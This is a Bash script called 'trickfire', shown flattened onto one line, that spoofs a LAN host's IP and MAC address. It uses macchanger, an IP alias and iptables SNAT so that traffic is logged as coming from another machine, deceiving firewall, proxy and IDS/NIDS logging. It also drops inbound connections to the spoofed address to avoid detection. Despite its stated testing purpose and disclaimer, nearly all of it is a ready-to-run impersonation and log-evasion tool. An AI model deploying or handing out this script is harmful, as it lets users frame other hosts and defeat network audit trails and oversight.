#!/bin/bash # Version: 0.1 (24/07/2013) # Author: Vittorio Milazzo - vittorio.milazzo at gmail.com # # Notes: Bash script that permit to spoof Lan connections # and deceive firewall,proxy,IDS/NIDS traffic logging. # # Prerequisite packages: macchanger, netfilter # ============ # Intended use # ============ # The script purpose is to test how is possible to deceive firewall/proxy/NIDS logging in a local network. # ========== # Disclaimer # ========== # The author published this script and the information under the condition that them # will not be used for to bring to himself or others a profit or to bring to others damage. # The author is not responsible for any damage or losses of any kind caused by the use or # misuse of the script and from the information contained therein. # Author is not liable in any case of damage, including direct, indirect, incidental, # consequential loss of business profits or special damages. # ======= # Details # ======= # Three-way handshake completition: # This script assign ip alias ($spoof_ip) to network interface card, and change mac-address # using macchanger. After wich, iptables SNAT will send outgoing packets with ip alias address # and mac-address that we have changed. Hosts that will receive SYN spoofed packets, # will response with ACK flags to our ip alias (so packets will reach us), and SYN/ACK packets will be send # from our ip alias to target hosts. # # BE CAREFULL: # When spoofed ip/mac address is an alive host in our Lan, it may happen that both (we and spoofed host) # will lose some packets and some established connections will drop. clear BANNER="trickfire v.0.1: Spoofing Lan connection - Firewall and IDS/NIDS deception logging" ######################### # 1.) NETWORK VARIABLES # ######################### # Set Lan default gateway ip address router="192.168.0.200" # Set network interface card used for spoofing interface="eth0" # Our real ip address real_ip=`ifconfig $interface | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}';` # Our authentic mac address real_mac="c8:0a:a9:c0:49:a4" ########################## # 2.) SPOOFING VARIABLES # ########################## # # VARIANTS: # # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # # For deceive firewall/proxy or IDS/NIDS logging, you need to send spoofed packets to their. # # But if you are not sure about firewall or Nids ip address, or you don't know if in Lan there are some other NIDS # or sniffer with ip address on a different class, will be better to send spoofed packets to all (0/0). # This setting will permit to spoof connection vs all Lan hosts too. # # # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # # Otherwise, if in your network is not present a proxy server or IDS/NIDS, or you are not interested # to test spoofing Lan connections, you can deceive Firewall Internet traffic logging specifying your # Lan class ID with net prefix. (Ex: lan_id="192.168.0.0/24"). # With this option, iptables SNAT doesn't will send spoofed packets on entire Lan network ( ! -d $lan_id ), # and spoofed packets will arrive (and will log) only from default gateway (firewall or router). # # If you will use this setting, remember to comment/uncomment too appropriate iptables command below (in functions section). lan_id="0/0" # Ip address that you want to spoof spoof_ip="192.168.0.216" # Mac address that you want to spoof spoof_mac="ec:9a:74:64:f6:33" ################# # 3.) FUNCTIONS # ################# enable_spoof () { ifconfig $interface down macchanger -m $spoof_mac $interface >/dev/null ifconfig $interface:1 $spoof_ip ifconfig $interface up # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="0/0" # iptables -t nat -I POSTROUTING -d $lan_id -j SNAT --to $spoof_ip # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="x.x.x.x/net_prefix" # (and comment iptables command above). # #iptables -t nat -I POSTROUTING ! -d $lan_id -j SNAT --to $spoof_ip # Block incoming connection (to avoid to be detected by possible listening services) iptables -I INPUT -i $interface -d $spoof_ip -p tcp --syn -m state --state NEW -j DROP iptables -I INPUT -i $interface -d $spoof_ip -p udp -m state --state NEW -j DROP route add default gw $router } disable_spoof () { ifconfig $interface down >/dev/null macchanger -m $real_mac $interface >/dev/null ifconfig $interface:1 down 2>/dev/null iptables -t nat -F ifconfig $interface up echo -e "\033[0;32mDefault gateway: $router\033[m" route add default gw $router } case "$1" in start) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing started"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mSpoofed ip: $spoof_ip\033[m" echo -e "\033[0;32mSpoofed mac address: $spoof_mac\033[m" echo enable_spoof echo exit 0 ;; stop) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing stopped\033[m";echo echo -e "\033[31mBack to normal configuration:\033[m"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mIp address: $real_ip\033[m" echo -e "\033[0;32mMac adress: $real_mac\033[m" disable_spoof echo exit 0 ;; *) echo echo -e " \033[31m#####################################################################\033[m" echo -e " \033[31m# trickfire v.0.1 #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Spoofing Lan connection - Firewall and IDS/NIDS deception logging #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Vittorio Milazzo - vittorio.milazzo at gmail.com #\033[m" echo -e " \033[31m#####################################################################\033[m" echo;echo -e "\033[36m1.) Change variables inside the script\033[m" echo;echo -e "\033[36m2.) Usage: ./trickfire.sh {start|stop}\033[m" echo exit 1 ;; esac exit 0